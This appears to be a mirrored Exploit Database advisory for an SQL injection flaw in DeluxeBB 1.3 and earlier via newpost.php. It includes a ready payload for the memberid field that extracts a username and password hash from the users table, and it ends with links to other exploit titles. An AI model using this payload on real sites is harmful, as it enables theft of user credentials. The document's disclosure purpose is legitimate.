DeluxeBB 1.x – ‘newpost.php’ SQL Injection

Exploit Database
86 阅读

作者： Stefan Esser

日期： 2010-05-06
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33945/

source: https://www.securityfocus.com/bid/39962/info

DeluxeBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

DeluxeBB 1.3 and earlier versions are vulnerable. 

The following example data is available:

membercookie=guest
memberid=xx',(select+concat(username,0x2e,pass)+from+deluxebb_users+limit+1),'none',0,0,0,0,0,'guest','1269081154')+--+x

last Exploits
DeluxeBB 1.x – ‘newpost.php’ SQL Injection的更多信息

2DayBiz ybiz Polls Script – SQL Injection：
Flippa Clone – SQL Injection：
Joomla! Component com_alphacontent – ‘limitstart’ SQL Injection：
Joomla! Component Catalog 1.0.7 – SQL Injection：
Apache HTTP Server 2.4.50 – Remote Code Execution (RCE) (3)：
seagull 0.6.7 – Remote File Inclusion：
ImgPals Photo Host 1.0 – Admin Account Disactivation：
Hotel Booking Portal 0.1 – Multiple SQL Injections / Cross-Site Scripting：